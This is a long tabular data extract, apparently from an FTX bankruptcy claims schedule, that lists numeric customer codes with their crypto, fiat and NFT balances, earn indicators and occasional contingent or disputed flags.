| 07368799 | | BAT[11.15357476], BCH[.04935215], BRZ[5], BTC[.00048012], CUSDT[103.50056029], DOGE[521.03403162], ETH[.00269197], ETHW[.00266461], GRT[51.66415875], LINK[7.83849919], LTC[1.55765349], MATIC[61.51890413], SHIB[84474.82033445], SOL[3.30087104], SUSHI[12.55326018], TRX[28.14168945], UNI[1.53998018], USD[1.79] | Yes | |
| 07368800 | | USD[10.00] | | |
| 07368801 | | BRZ[1], USD[0.01] | | |
| 07368802 | | USD[10.00] | | |
| 07368803 | | CUSDT[6], DOGE[33.42435571], USD[0.65] | | |
| 07368804 | | BAT[1], DOGE[1500.73572067], GRT[8.05387734], USD[0.00] | | |
| 07368805 | | USD[10.00] | | |
| 07368806 | | USD[10.00] | | |
| 07368807 | | USD[10.00] | | |
| 07368808 | | USD[10.00] | | |
| 07368809 | | BRZ[4], CUSDT[4], DOGE[1], TRX[1], USD[0.00] | | |
| 07368810 | | NFT (293220345756708929/Barcelona Ticket Stub #2423)[1], NFT (320454848803926507/FTX - Off The Grid Miami #1220)[1], SHIB[31271.33798037], USD[0.00] | Yes | |
| 07368811 | | USD[10.00] | | |
| 07368812 | | USD[10.00] | | |
| 07368813 | | USD[10.00] | | |
| 07368814 | | USD[10.00] | | |
| 07368815 | | USD[10.00] | | |
| 07368816 | | USD[10.00] | | |
| 07368817 | | SHIB[1], USD[0.00] | | |
| 07368818 | | USD[0.01] | | |
| 07368819 | | USD[0.00] | Yes | |
| 07368820 | | CUSDT[1], DOGE[722.98076382], TRX[1], USD[0.01] | | |
| 07368821 | | SHIB[371471.02526002], USD[0.00] | | |
| 07368822 | | USD[10.00] | | |
| 07368823 | | USD[10.00] | | |
| 07368824 | | USD[10.00] | | |
| 07368825 | | BTC[.000221], USD[0.00] | | |
| 07368827 | | BAT[1], BRZ[4], CUSDT[11], DOGE[5], GRT[1], SHIB[4436901.25697031], TRX[8], USD[415.47] | | |
| 07368829 | | USD[10.00] | | |
| 07368831 | | DOGE[0], SHIB[1], SOL[0], TRX[.0000004], UNI[0], USD[0.01] | | |
| 07368832 | | BTC[.00015669], CUSDT[2], ETH[.02816935], ETHW[.02816935], USD[0.00] | | |
| 07368833 | | USD[0.00] | Yes | |
| 07368834 | | USD[10.00] | | |
| 07368835 | | DOGE[1], USD[0.00] | | |
| 07368836 | | BRZ[0.00293538], BTC[0], DOGE[0], GRT[0], LINK[0], USD[0.00], USDT[0.00034801] | | |
| 07368837 | | USD[10.00] | | |
| 07368838 | | BRZ[1], BTC[0.78387163], CUSDT[3], DOGE[0], ETH[0], TRX[4], USD[0.00], USDT[1.07106049] | Yes | |
| 07368840 | | BTC[.00153901], CUSDT[1], DOGE[448.12568758], KSHIB[310.64308243], SHIB[393822.02556193], USD[0.00] | Yes | |
| 07368842 | | BRZ[1], CUSDT[4], USD[0.00] | | |
| 07368843 | | USD[10.00] | | |
| 07368844 | | CUSDT[2], DOGE[2], USD[0.00] | | |
| 07368845 | | USD[10.00] | | |
| 07368846 | | DOGE[3], TRX[1], USD[0.00] | | |
| 07368847 | | DOGE[140.53022334], USD[0.00] | | |
| 07368848 | | CUSDT[1], DOGE[297.04077372], USD[0.00] | | |
| 07368850 | | USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07368851 | | BAT[.00016089], BRZ[2], CUSDT[6], DOGE[10005.71231486], LINK[.00016704], TRX[4], USD[0.00] | | |
| 07368852 | | CUSDT[2], USD[0.00] | | |
| 07368853 | | DOGE[2045.13526789], USD[0.00] | | |
| 07368854 | | BRZ[4], CUSDT[20], DOGE[3], GRT[1.00127015], SOL[0], TRX[2.00013275], USD[0.00], USDT[0.00000012] | Yes | |
| 07368856 | | BTC[.00189099], CUSDT[10], SHIB[1], TRX[257.01749179], USD[11.68] | Yes | |
| 07368857 | | BF_POINT[300], DOGE[0], SHIB[1], SOL[0], USD[269.47] | Yes | |
| 07368858 | | USD[10.00] | | |
| 07368859 | | CUSDT[4], DOGE[1616.37984777], SHIB[662251.65562913], TRX[840.4942588], USD[0.00] | | |
| 07368861 | | DOGE[137.01992637], TRX[1], USD[0.00] | | |
| 07368862 | | USD[10.00] | | |
| 07368863 | | BTC[.00000278], DOGE[0.88061302], SHIB[1], USD[17.73] | | |
| 07368864 | | USD[10.00] | | |
| 07368865 | | USD[10.00] | | |
| 07368866 | | USD[10.00] | | |
| 07368867 | | DOGE[210.58226417], USD[0.00] | | |
| 07368868 | | USD[10.00] | | |
| 07368870 | | NFT (439502100958428580/FTX - Off The Grid Miami #4854)[1], NFT (572564158386181796/Entrance Voucher #2378)[1] | | |
| 07368871 | | DOGE[182.16326528], USD[0.00] | | |
| 07368873 | | BAT[0], DOGE[0], USD[0.08] | | |
| 07368874 | | USD[10.00] | | |
| 07368875 | | BRZ[1], CUSDT[4], ETH[.00030773], ETHW[.00030773], SOL[67.67512817], TRX[5376.27344005], USD[170.76] | Yes | |
| 07368876 | | USD[0.00] | Yes | |
| 07368877 | | AAVE[.06366954], BAT[100.62071337], BTC[.00316921], CUSDT[7], DOGE[1], ETH[0.10151662], ETHW[0.10447364], GRT[31.21642402], LINK[0.63916187], LTC[0.17577966], MATIC[5.34563062], MKR[.0044258], SHIB[299895.20372617], SOL[.23145085], SUSHI[.9921337], TRX[521.54096095], UNI[.8456938], USD[0.00] | Yes | |
| 07368878 | | BAT[1], BRZ[1], CUSDT[1], DOGE[.00000739], LINK[0], TRX[1], USD[0.00], USDT[1] | | |
| 07368879 | | USD[10.00] | | |
| 07368880 | | BRZ[2], CUSDT[16], ETH[.50427476], ETHW[.50406311], TRX[4], USD[0.00] | Yes | |
| 07368884 | | BTC[0.00000231], LTC[.00404], USD[0.00] | | |
| 07368885 | | BTC[0.00000752], DOGE[.5717], ETH[.0000001], ETHW[0], LINK[.02965599], LTC[.0081255], SUSHI[.4512], USD[0.95], USDT[0] | | |
| 07368886 | | BRZ[1], CUSDT[3], DOGE[1113.97110276], TRX[5], USD[0.00] | | |
| 07368887 | | BAT[1], BRZ[1], DOGE[1], USD[0.00] | | |
| 07368888 | | BAT[0], BTC[0], DOGE[0], ETH[0], LTC[0], SOL[0], TRX[0], USD[0.33] | | |
| 07368889 | | BRZ[1], CUSDT[2], DOGE[139.28128125], GRT[.00447635], USD[0.00] | | |
| 07368890 | | BRZ[4], BTC[.13028329], CUSDT[8], DOGE[4056.60223165], GRT[1], LINK[4.05473111], LTC[5.72567043], SHIB[6289261.35976187], SOL[1], TRX[5.04709159], USD[0.00] | | |
| 07368891 | | DOGE[1], USD[0.00] | Yes | |
| 07368892 | | BAT[23.07658824], DOGE[4], GRT[27.75940352], SOL[2.69762892], SUSHI[.89043824], UNI[.51097843], USD[33.73] | | |
| 07368893 | | USD[0.00] | | |
| 07368894 | | BRZ[1], CUSDT[5], USD[0.01], USDT[1] | | |
| 07368895 | | SOL[1.08112836], USD[0.00] | | |
| 07368896 | | CUSDT[1], DOGE[1334.17932863], USD[0.25] | | |
| 07368897 | | USD[10.00] | | |
| 07368898 | | USD[10.00] | | |
| 07368899 | | BRZ[2], CUSDT[6], DOGE[1], GRT[1], USD[6.28], USDT[1.96820522] | | |
| 07368900 | | LTC[0], USD[0.00] | | |
| 07368901 | | USD[10.00] | | |
| 07368902 | | USD[10.00] | | |
| 07368903 | | USD[10.00] | | |
| 07368905 | | BRZ[1], BTC[0], DOGE[206166.73529411], TRX[2], USD[0.00] | | |
| 07368907 | | CUSDT[1], USD[0.01] | | |
| 07368909 | | BAT[2.07423344], BRZ[1], CUSDT[1], TRX[5], USD[0.00], USDT[2.15076295] | Yes | |
| 07368911 | | DOGE[1], TRX[155.75289140], USD[0.00] | | |
| 07368912 | | USD[10.00] | | |
| 07368913 | | USD[0.01] | | |
| 07368914 | | USD[10.00] | | |
| 07368915 | | BAT[19.58261661], BTC[.00036054], CUSDT[11], DOGE[2664.92167895], ETH[.00402711], ETHW[.00397239], GRT[22.97279067], KSHIB[152.98985997], MATIC[9.52239455], MKR[.00350966], SHIB[497201.11461773], SOL[1.81363089], SUSHI[1.98083024], TRX[282.92820687], USD[9.31], YFI[.00032757] | Yes | |
| 07368916 | | USD[0.01] | | |
| 07368917 | | BAT[1], CUSDT[3], DOGE[ 16231575], TRX[1], USD[0.46] | | |
| 07368919 | | CUSDT[1], DOGE[1], TRX[1], USD[20.15], USDT[0] | | |
| 07368920 | | CUSDT[1], DOGE[250.0704867], KSHIB[.11998321], SHIB[.00000342], TRX[1], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07368922 | | USD[10.00] | | |
| 07368923 | | USD[10.00] | | |
| 07368925 | | BRZ[0], BTC[0], DOGE[0], ETH[0], ETHW[0], USD[0.00], USDT[0] | | |
| 07368927 | | BAT[1.0165555], BRZ[2], CUSDT[27], GRT[1.00498957], SHIB[11], TRX[11.00087675], USD[3187.99] | Yes | |
| 07368928 | | TRX[3.40587547], USD[0.00] | | |
| 07368931 | | CUSDT[1], DOGE[1149.92615627], USD[0.00] | | |
| 07368932 | | USD[10.00] | | |
| 07368933 | | USD[0.00] | Yes | |
| 07368934 | | LINK[1.04856691], USD[0.00], USDT[2.09714693] | Yes | |
| 07368935 | | DOGE[805.68668588], USD[0.00] | | |
| 07368936 | | BCH[0], DOGE[1], USD[10.00] | | |
| 07368937 | | USD[10.00] | | |
| 07368938 | | BTC[0], CUSDT[1.13002257], TRX[1], USD[0.00] | | |
| 07368939 | | USD[10.00] | | |
| 07368940 | | USD[0.01] | | |
| 07368941 | | USD[0.01] | | |
| 07368942 | | USD[0.00] | | |
| 07368944 | | BRZ[2.83140302], CUSDT[1], DOGE[.06525833], USD[0.00] | | |
| 07368945 | | CUSDT[3], DOGE[0], ETH[0], MATIC[0], SHIB[2], USD[139.84] | Yes | |
| 07368946 | | USD[10.00] | | |
| 07368947 | | BRZ[1], CUSDT[2], DOGE[2], ETH[0], GRT[1], LINK[0], USD[0.00] | | |
| 07368948 | | USD[10.00] | | |
| 07368949 | | BTC[0], DOGE[0], SOL[0], USD[0.39] | | |
| 07368950 | | USD[10.00] | | |
| 07368951 | | ETH[.00616943], ETHW[.00616943], USD[0.00] | | |
| 07368952 | | CUSDT[1], DOGE[.0000631], GRT[.00001177], TRX[4], USD[4012.69] | | |
| 07368954 | | CUSDT[1], USD[41.48] | | |
| 07368955 | Contingent, Disputed | USD[10.00] | | |
| 07368957 | | BRZ[1], CUSDT[2], DOGE[6285.45965513], USD[0.00] | | |
| 07368959 | | USD[10.00] | | |
| 07368961 | | BRZ[0], DOGE[0], ETH[0], TRX[1], USD[0.00], USDT[0] | | |
| 07368963 | | USD[10.00] | | |
| 07368964 | | USD[10.00] | | |
| 07368965 | | USD[0.01] | | |
| 07368966 | | USD[10.00] | | |
| 07368967 | | USD[10.00] | | |
| 07368968 | | BRZ[1], BTC[.00161437], USD[0.00] | Yes | |
| 07368969 | | USD[10.00] | | |
| 07368971 | | USD[10.00] | | |
| 07368972 | | CUSDT[1], DOGE[103.23342462], LINK[2.41487423], USD[0.00] | | |
| 07368973 | | CUSDT[4], DOGE[2.95407798], TRX[1.89103587], USD[5.63] | | |
| 07368974 | | AAVE[.2826481], AUD[0.00], AVAX[3.075692], BTC[0.00464263], CUSDT[0], ETH[0.04800395], ETHW[0.04800395], GBP[0.00], GRT[0], LINK[0], LTC[0], MATIC[27.0214751], SOL[0.24777360], UNI[1.295405], USD[863.93], USDT[101.98135018] | | |
| 07368975 | | USD[10.00] | | |
| 07368976 | | BTC[0], DOGE[0], ETH[1.52435624], ETHW[0], GRT[0], LINK[0], MATIC[3834.77763769], NFT [396333594799008810/FTX Crypto Cup 2022 Key #1400][1], SOL[0], UNI[0], USD[351.35], USDT[0.00000001], YFI[0] | | |
| 07368977 | | CUSDT[2], DOGE[1], TRX[1], USD[0.00] | | |
| 07368979 | | BTC[0], DOGE[1], GRT[6.02651362], PAXG[0], USD[192.86] | Yes | |
| 07368980 | | USD[0.00] | | |
| 07368981 | | USD[10.00] | | |
| 07368984 | | DOGE[148.52646071], USD[0.00] | | |
| 07368985 | | USD[10.00] | | |
| 07368986 | | USD[10.00] | | |
| 07368987 | | DOGE[166.22017158], USD[0.00] | | |
| 07368989 | | BTC[.00000193], USD[0.00] | Yes | |
| 07368990 | | CUSDT[3], DOGE[3], GRT[1], LTC[12.92728656], TRX[2], USD[0.00] | | |
| 07368992 | | CUSDT[2], USD[0.01] | | |
| 07368993 | | USD[10.00] | | |
| 07368995 | | BRZ[4], CUSDT[1], DOGE[52.76482945], GRT[2.04027208], SHIB[14270768.61336144], TRX[2251.73326184], USD[0.00], USDT[0] | Yes | |
| 07368996 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07368997 | | BRZ[1], USD[0.00] | | |
| 07368998 | | USD[10.00] | | |
| 07368999 | | CUSDT[1], DOGE[.36435791], USD[0.06] | | |
| 07369001 | | DOGE[2], USD[0.00], USDT[4.58400547] | Yes | |
| 07369002 | | USD[10.00] | | |
| 07369003 | | USD[0.00], USDT[0] | | |
| 07369004 | | USD[10.00] | | |
| 07369005 | | USD[10.00] | | |
| 07369007 | | DOGE[1], USD[0.01] | | |
| 07369009 | | USD[10.00] | | |
| 07369010 | | SUSHI[1.494], USD[0.00], USDT[0.00000005] | | |
| 07369011 | | TRX[66.02453807], USD[0.00], USDT[0] | | |
| 07369012 | | BTC[.02024656], DOGE[0.00621203], ETH[0.21864291], ETHW[0.00000166], SHIB[1], SOL[5.78029994], USD[0.00] | Yes | |
| 07369013 | | USD[10.00] | | |
| 07369014 | | DOGE[1], TRX[3], UNI[3.91287128], USD[0.00] | | |
| 07369016 | | LTC[.00299384], SOL[.00000001], USD[0.00] | | |
| 07369018 | | USD[10.00] | | |
| 07369019 | | BRZ[3], CUSDT[19], ETH[0], MATIC[0], SHIB[4], SOL[0], SUSHI[8.09091178], TRX[15.36592830], USD[0.00], USDT[1.09966337] | Yes | |
| 07369020 | | CUSDT[1], TRX[2], USD[0.00] | | |
| 07369021 | | DOGE[1068.24841921], USD[0.00] | | |
| 07369022 | | USD[10.98] | Yes | |
| 07369023 | | BAT[0], BTC[0], CUSDT[0], DOGE[0], GRT[0], SOL[0], TRX[2], USD[0.00], USDT[0] | Yes | |
| 07369024 | | USD[10.00] | | |
| 07369025 | | USD[0.00] | Yes | |
| 07369026 | | USD[10.00] | | |
| 07369027 | | USD[10.00] | | |
| 07369029 | | DOGE[24.94108354], USD[0.00] | | |
| 07369030 | | BAT[64.24352243], BTC[.00584314], CUSDT[4], DOGE[1079.50474427], ETH[.03327551], ETHW[.03286481], LINK[36.49996649], TRX[3], USD[0.00] | Yes | |
| 07369031 | | BRZ[1], CUSDT[1], DOGE[2], USD[0.01] | | |
| 07369032 | | USD[10.00] | | |
| 07369033 | | DOGE[140.65389998], USD[0.00] | | |
| 07369034 | | CUSDT[1], DOGE[1452.23056323], USD[0.00] | Yes | |
| 07369035 | | USD[10.00] | | |
| 07369036 | | BRZ[2], BTC[0], DOGE[1], LTC[0], TRX[1], USD[0.00], USDT[0.00000001] | | |
| 07369037 | | BRZ[1], DOGE[.51644912], SOL[.0000093], TRX[1], UNI[.00005289], USD[0.00] | | |
| 07369038 | | DOGE[4.68247539], TRX[72.94208567], USD[0.00] | | |
| 07369039 | | BCH[0], BRZ[1], BTC[0], CUSDT[6], DOGE[0], ETH[0], GRT[0], SOL[0], SUSHI[0], TRX[0], USD[0.01], USDT[.59640598] | | |
| 07369040 | | USD[10.00] | | |
| 07369041 | | USD[10.00] | | |
| 07369042 | | USD[10.00] | | |
| 07369043 | | USD[10.00] | | |
| 07369044 | | BCH[0], BTC[0], CUSDT[1], USD[0.00] | | |
| 07369045 | | CUSDT[4.80168666], DOGE[.00011592], ETH[.00000001], ETHW[.00000001], TRX[.00036191], USD[0.01] | | |
| 07369046 | | USD[10.00] | | |
| 07369047 | | CUSDT[1], USD[0.00] | | |
| 07369048 | | TRX[2], USD[0.01] | | |
| 07369049 | | USD[0.00] | | |
| 07369050 | | SOL[.9644807], TRX[43.55168332], USD[0.00] | | |
| 07369051 | | USD[10.00] | | |
| 07369052 | | USD[10.00] | | |
| 07369054 | | USD[10.00] | | |
| 07369055 | | USD[0.01] | | |
| 07369056 | | USD[10.00] | | |
| 07369057 | | CUSDT[9], USD[0.00] | | |
| 07369058 | | LTC[0], TRX[.000001], USD[0.00], USDT[1.99399331] | | |
| 07369059 | | DOGE[1], USD[0.01] | Yes | |
| 07369060 | | BAT[2.13247567], BRZ[19.8766447], CUSDT[50.32093813], DOGE[289.86343435], ETH[.00000024], ETHW[0.00000024], GRT[4.11252737], MATIC[.06031074], SHIB[1578163.41765059], TRX[12.01579119], USD[0.99], USDT[0.00000001], YFI[.00000132] | Yes | |
| 07369061 | | USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07369062 | | BRZ[1], BTC[.01140419], DOGE[1], LINK[15.87164533], USD[10.00] | | |
| 07369063 | | CUSDT[1], DOGE[2183.56937796], SHIB[2540650.40650406], USD[0.00] | | |
| 07369065 | | USD[10.00] | | |
| 07369067 | | BAT[0], DOGE[0], GRT[0], SOL[0], USD[0.00] | | |
| 07369068 | | DOGE[130.05416512], ETH[.00047248], ETHW[.00047248], USD[0.00] | Yes | |
| 07369069 | | TRX[2], USD[0.01] | | |
| 07369070 | | USD[10.00] | | |
| 07369071 | | ETH[0], USD[0.00] | | |
| 07369073 | | BTC[.00767384], CUSDT[1], DOGE[1040.76503353], TRX[1], USD[3.00] | | |
| 07369074 | Contingent, Disputed | USD[10.00] | | |
| 07369075 | | DOGE[1], USD[0.00] | Yes | |
| 07369076 | | USD[10.00] | | |
| 07369077 | | USD[10.00] | | |
| 07369078 | | USD[10.00] | | |
| 07369079 | | USD[0.00] | | |
| 07369080 | | DOGE[2], USD[0.00] | | |
| 07369081 | | BTC[.00066891], CUSDT[263.20382781], DOGE[3371.04590661], TRX[1], USD[0.00] | Yes | |
| 07369082 | | USD[10.00] | | |
| 07369083 | | USD[10.00] | | |
| 07369084 | | USD[10.00] | | |
| 07369085 | | CUSDT[7], DOGE[12.64831135], TRX[1], USD[0.39] | | |
| 07369086 | | CUSDT[1], GRT[.00006563], SOL[.04213927], USD[0.00] | Yes | |
| 07369087 | | SOL[1.09494593], USD[0.00] | | |
| 07369088 | | USD[10.00] | | |
| 07369089 | Contingent, Disputed | USD[0.00], USDT[0] | Yes | |
| 07369090 | | USD[10.00] | | |
| 07369091 | | USD[10.00] | | |
| 07369092 | | CUSDT[54.22648302], DOGE[5.11534415], GRT[1], SHIB[13], SOL[0], TRX[2], USD[0.00] | | |
| 07369093 | | BTC[0], DOGE[0], ETH[0], SOL[0], USD[0.00] | | |
| 07369094 | | USD[10.00] | | |
| 07369095 | | BAT[3], BRZ[1], BTC[0], CUSDT[7], ETH[0], GRT[2], SOL[0], TRX[2], USD[0.00], USDT[3] | | |
| 07369096 | | USD[10.00] | | |
| 07369097 | | USD[10.00] | | |
| 07369098 | | USD[10.00] | | |
| 07369099 | | USD[10.00] | | |
| 07369100 | | BTC[0], DOGE[1], USD[0.00] | | |
| 07369101 | | USD[10.00] | | |
| 07369102 | | BTC[.00010297], EUR[2.47], USD[0.00], USDT[1.98722585] | | |
| 07369104 | | BTC[0] | | |
| 07369105 | | USD[10.00] | | |
| 07369106 | | BRZ[1], CUSDT[4], DOGE[.00000972], TRX[3], USD[0.01] | | |
| 07369107 | | ETH[.00001923], ETHW[2.10634659], LINK[.00043972], SUSHI[.00105032], USD[0.00] | Yes | |
| 07369108 | | USD[10.00] | | |
| 07369109 | | BAT[1], BTC[.00020736], DOGE[1], ETHW[5.41915195], USD[0.00] | Yes | |
| 07369110 | | BTC[0], USD[3377.68] | | |
| 07369111 | | USD[10.00] | | |
| 07369112 | | USD[10.00] | | |
| 07369115 | | USD[10.00] | | |
| 07369116 | | USD[10.00] | | |
| 07369117 | | USD[10.00] | | |
| 07369118 | | USD[0.00] | | |
| 07369119 | | DOGE[3.08608315], SHIB[62.30829887], USD[0.00], USDT[0.00000001] | Yes | |
| 07369120 | | USD[10.00] | | |
| 07369121 | | USD[10.00] | | |
| 07369122 | | SOL[.3250648], USD[0.00] | | |
| 07369123 | | CUSDT[3], DOGE[0], ETH[0], USD[0.00] | | |
| 07369124 | | USD[0.00] | | |
| 07369125 | | CUSDT[2], DOGE[2582.83985334], SHIB[17693159.35470036], TRX[.6029471], USD[0.06] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07369127 | | BAT[1], BRZ[1], CUSDT[1], DOGE[0], ETH[0], ETHW[0], GRT[1], TRX[1], USD[0.00] | | |
| 07369128 | | BRZ[1], CUSDT[4], USD[0.01] | | |
| 07369129 | | USD[0.00] | | |
| 07369130 | | BRZ[3], CUSDT[4], DOGE[9805.77119968], GRT[73.54207337], SHIB[32245035.08607186], SOL[19.83336321], TRX[233.80775504], USD[0.03] | Yes | |
| 07369131 | | USD[10.00] | | |
| 07369132 | | USD[10.00] | | |
| 07369133 | | DOGE[1730.99096771], TRX[1], USD[0.00] | | |
| 07369134 | | USD[0.01] | | |
| 07369135 | | BRZ[1], CUSDT[3], DOGE[.06659954], GRT[4], TRX[1], USD[0.77], USDT[1] | | |
| 07369136 | | USD[10.00] | | |
| 07369137 | | USD[10.00] | | |
| 07369139 | | USD[10.00] | | |
| 07369140 | | USD[10.00] | | |
| 07369141 | | DOGE[1122.79481133], USD[0.00] | | |
| 07369142 | | BRZ[2], CUSDT[2338.80867841], DOGE[157.09597055], USD[0.00] | | |
| 07369143 | | USD[10.00] | | |
| 07369144 | | CUSDT[10], TRX[0], USD[0.01] | | |
| 07369145 | | CUSDT[3], DOGE[351.45166357], USD[0.00] | | |
| 07369146 | | USD[0.02] | | |
| 07369147 | | BAT[1], BTC[0], DOGE[0], ETH[0], SHIB[2], SOL[0], USD[5000.00], USDT[0.00008123] | Yes | |
| 07369148 | | CUSDT[6], TRX[1], USD[0.01] | | |
| 07369149 | | CUSDT[.00797588], DOGE[.00020781], TRX[1.00424805], USD[0.00] | | |
| 07369150 | | USD[0.01] | Yes | |
| 07369151 | | USD[0.00] | | |
| 07369152 | | USD[0.00] | | |
| 07369153 | | USD[10.00] | | |
| 07369154 | | USD[10.00] | | |
| 07369156 | | BRZ[1], CUSDT[4], DOGE[1], ETH[0], ETHW[0], GRT[2.0821915], KSHIB[0], SOL[0], TRX[7], USD[0.00], USDT[2.17993090], YFI[0] | Yes | |
| 07369157 | | CUSDT[1], DOGE[0], USD[0.00] | | |
| 07369158 | | CUSDT[2], DOGE[60.99890875], TRX[1], USD[0.00] | | |
| 07369159 | | CUSDT[1], TRX[219.87666999], USD[0.00] | Yes | |
| 07369160 | | USD[10.00] | | |
| 07369161 | | BRZ[1], USD[10.00], USDT[0.00000004] | | |
| 07369162 | | USD[10.00] | | |
| 07369163 | | DOGE[26.79556994], USD[0.02] | Yes | |
| 07369164 | | USD[10.00] | | |
| 07369165 | | BTC[.00000851], USD[0.00] | | |
| 07369166 | | USD[10.00] | | |
| 07369167 | | ETH[.00567839], ETHW[.00567839], USD[0.00] | | |
| 07369168 | | CUSDT[2], DOGE[1.00003882], USD[0.00] | | |
| 07369169 | | USD[10.00] | | |
| 07369170 | | USD[10.00] | | |
| 07369171 | | USD[10.00] | | |
| 07369172 | | BTC[.00020685], USD[0.00] | | |
| 07369173 | | USD[0.01] | | |
| 07369174 | | USD[0.00] | | |
| 07369175 | | CUSDT[2], DOGE[2], GRT[6.59603838], USD[0.00] | | |
| 07369176 | | USD[10.00] | | |
| 07369178 | | DOGE[146.87937736], USD[0.00] | Yes | |
| 07369179 | | USD[10.00] | | |
| 07369180 | | BAT[1.0165555], BRZ[2], CUSDT[11], DOGE[2], ETH[0], SHIB[1], SOL[0], TRX[3], USD[0.00] | Yes | |
| 07369181 | | TRX[1], USD[10.00] | | |
| 07369182 | | USD[10.00] | | |
| 07369183 | | UNI[.45602889], USD[0.00] | | |
| 07369186 | | USD[3429.78] | Yes | |
| 07369187 | | USD[11.06] | Yes | |
| 07369188 | | BTC[.00003844], DOGE[107.09114608], USD[0.00] | | |
| 07369189 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07369190 | | USD[10.00] | | |
| 07369191 | | CUSDT[4], TRX[1], USD[0.01] | | |
| 07369192 | | SOL[.97391428], USD[0.00] | | |
| 07369193 | | USD[10.00] | | |
| 07369194 | | USD[4.87] | | |
| 07369195 | | USD[10.00] | | |
| 07369199 | | USD[10.00] | | |
| 07369200 | | USD[10.67] | Yes | |
| 07369201 | | BTC[.00007810], DOGE[0.54000000], USD[0.10] | | |
| 07369203 | | CUSDT[1], DOGE[3352.19521953], USD[0.00], USDT[1] | | |
| 07369204 | | BCH[0], BTC[0], DAI[0], DOGE[0], ETH[0], ETHW[0.00001308], GRT[0], LINK[0], SUSHI[0], TRX[8.00087675], UNI[0], USD[1.32] | Yes | |
| 07369205 | | USD[10.00] | | |
| 07369206 | | CUSDT[2], DOGE[1], GRT[0], SOL[0], SUSHI[.00000001], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07369207 | | USD[10.00] | | |
| 07369208 | | BTC[.00017838], USD[0.00] | | |
| 07369210 | | USD[10.00] | | |
| 07369211 | | BAT[0], BRZ[0], BTC[0], CUSDT[1], DAI[0], DOGE[0], ETH[0], LTC[0], SUSHI[0], TRX[0], USD[0.00] | Yes | |
| 07369212 | | CUSDT[1], DAI[0], DOGE[33.37853073], SHIB[546271.57128945], USD[5.42] | Yes | |
| 07369214 | | BRZ[1], CUSDT[2], DOGE[133.70781862], TRX[128.23248479], USD[107.98] | | |
| 07369215 | | LINK[446.05504106], USD[0.35] | Yes | |
| 07369216 | | CUSDT[1], DOGE[494.18227517], USD[37.55] | | |
| 07369217 | | BTC[0], DOGE[0], GRT[0], SUSHI[0], USD[0.04] | | |
| 07369218 | | DOGE[37.70738211], USD[0.00] | | |
| 07369219 | | SOL[.34555289], USD[0.00] | Yes | |
| 07369220 | | USD[10.00] | | |
| 07369221 | | USD[10.00] | | |
| 07369222 | | USD[0.30], USDT[.05438955] | | |
| 07369223 | | DOGE[0], USDT[0.02385030] | | |
| 07369225 | | SHIB[5121154.27908447], USD[0.00], USDT[0] | Yes | |
| 07369226 | | DOGE[137.01851621], USD[0.00] | Yes | |
| 07369227 | | DOGE[21.78151549], USD[0.00] | | |
| 07369228 | | USD[10.00] | | |
| 07369229 | | USD[10.00] | | |
| 07369230 | | USD[10.00] | | |
| 07369231 | | USD[10.00] | | |
| 07369232 | | DOGE[29.44254197], TRX[1], USD[0.01] | | |
| 07369234 | | CUSDT[12.41050253], USD[0.00] | | |
| 07369235 | | USD[10.00] | | |
| 07369236 | | DOGE[.52022604], USD[7.22] | | |
| 07369237 | | LINK[0.27344127], USD[0.00] | Yes | |
| 07369238 | | BAT[1.37684716], BCH[.00023328], BTC[.00013369], CUSDT[52.37702649], DAI[0.50191389], DOGE[18.93125201], ETH[.00071507], ETHW[.00071085], GRT[.57162062], LINK[.01952559], LTC[.00334806], PAXGI[0.00030303], SOL[.08371547], SUSHI[.06356055], TRX[29.32283069], USD[2.22], USDT[.99418193], YFI[0.00003887] | Yes | |
| 07369239 | | USD[0.75], USDT[0] | Yes | |
| 07369240 | | BTC[.00078182], CUSDT[3], LINK[0], USD[0.00] | Yes | |
| 07369241 | | USD[10.00] | | |
| 07369242 | | USD[10.00] | | |
| 07369243 | | DOGE[11805.64725353], USD[10.00] | | |
| 07369244 | | DOGE[14.29082085], TRX[1], USD[0.00], USDT[0] | | |
| 07369245 | | USD[10.00] | | |
| 07369246 | | USD[10.00] | | |
| 07369247 | | USD[10.00] | | |
| 07369248 | | USD[10.00] | | |
| 07369249 | | DOGE[3411.51929895], TRX[1], USD[0.00] | | |
| 07369250 | | BTC[.00001965], DOGE[0], SHIB[3], SOL[0], SUSHI[.00345683], TRX[1], USD[0.00] | | |
| 07369251 | | USD[10.00] | | |
| 07369253 | | USD[0.00], USDT[0.18580100] | | |
| 07369254 | | USD[10.00] | | |
| 07369255 | | USD[10.00] | | |
| 07369256 | | ETH[0.00451744], ETHW[0.00446272], USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07369257 | | USD[10.00] | | |
| 07369258 | | DOGE[1.00046227], USD[0.00] | | |
| 07369259 | | USD[10.00] | | |
| 07369260 | | BRZ[1], CUSDT[2], DOGE[8278.5063776], USD[0.00] | Yes | |
| 07369262 | | USD[10.00] | | |
| 07369266 | | BTC[0], DOGE[0], ETH[0], USD[0.00] | Yes | |
| 07369267 | | USD[10.00] | | |
| 07369268 | | CUSDT[2], DOGE[1], TRX[1], USD[0.00] | | |
| 07369269 | | TRX[48.75172824], USD[7.00] | | |
